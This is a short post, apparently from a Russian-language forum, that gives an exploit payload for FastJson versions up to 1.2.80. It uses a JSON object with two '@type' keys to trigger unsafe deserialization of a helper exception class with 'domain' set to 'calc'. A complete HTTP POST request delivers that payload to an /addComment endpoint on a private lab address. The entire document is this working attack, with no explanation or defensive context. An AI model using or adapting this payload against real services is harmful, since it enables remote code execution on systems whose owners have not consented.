FastJson ≤1.2.80
Payload:
Payload:
Код:
{
"@type": "java.lang.Exception",
"@type": "com.github.isafeblue.fastjson.SimpleException",
"domain": "calc"
}
Код:
POST /addComment HTTP/1.1
Host: 10.211.55.7:8099
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 40
Content-Type: application/json; charset=utf-8
Cookie: LOGIN_LANG=cn
Origin: http://10.211.55.7:8099
Referer: http://10.211.55.7:8099/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
X-Requested-With: XMLHttpRequest
{
"@type": "java.lang.Exception",
"@type": "com.github.isafeblue.fastjson.SimpleException",
"domain": "calc"
}